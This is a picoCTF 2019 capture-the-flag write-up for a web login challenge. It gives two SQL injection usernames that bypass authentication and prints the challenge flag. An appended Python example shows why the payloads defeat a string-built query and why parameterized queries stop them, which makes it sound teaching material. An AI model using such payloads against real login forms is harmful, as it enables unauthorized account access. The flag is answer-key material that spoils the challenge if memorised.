Point: 300
Web Exploitation
There is a website running at https://2019shell1.picoctf.com/problem/37868/ (link) or http://2019shell1.picoctf.com:37868. Do you think you can log us in? Try to see if you can login!
There don't seem to be many ways to interact with this. I wonder if the users are kept in a database?
Try to think about how the website verifies your login.
This is a SQL injection vulnerability.
Username: ' OR 'A' = 'A' -- or another one: ' OR 1 --
Then click the Login button to see the flag.
picoCTF{s0m3_SQL_a57b0b1d}
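Why the two usernames above pass the login check, and why a parameterized query rejects them, shown as an added example that is not part of the original writeup or the challenge's code. The users table, the query shape and the SQLite backend are assumptions.

```python
import sqlite3

# Constructed sample data. The table layout and query shape are assumptions,
# not the challenge's actual backend.
def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (name TEXT, password TEXT)")
    db.execute("INSERT INTO users VALUES ('admin', 'constructed-secret')")
    return db

def login_vulnerable(db, username, password):
    # Input is pasted into the SQL text, so a quote in `username` closes the
    # string literal and everything after it is parsed as SQL. The trailing
    # "--" turns the password comparison into a comment.
    query = ("SELECT name FROM users WHERE name='%s' AND password='%s'"
             % (username, password))
    return query, db.execute(query).fetchone() is not None

def login_parameterized(db, username, password):
    # Placeholders keep the input as data: the quote and "--" are compared
    # literally against the name column and match no row.
    query = "SELECT name FROM users WHERE name=? AND password=?"
    return db.execute(query, (username, password)).fetchone() is not None

# The two usernames given in the writeup.
PAYLOADS = ["' OR 'A' = 'A' --", "' OR 1 --"]

if __name__ == "__main__":
    db = make_db()
    for payload in PAYLOADS:
        query, ok = login_vulnerable(db, payload, "")
        print("query sent:   ", query)
        print("vulnerable:   ", ok)
        print("parameterized:", login_parameterized(db, payload, ""))
```
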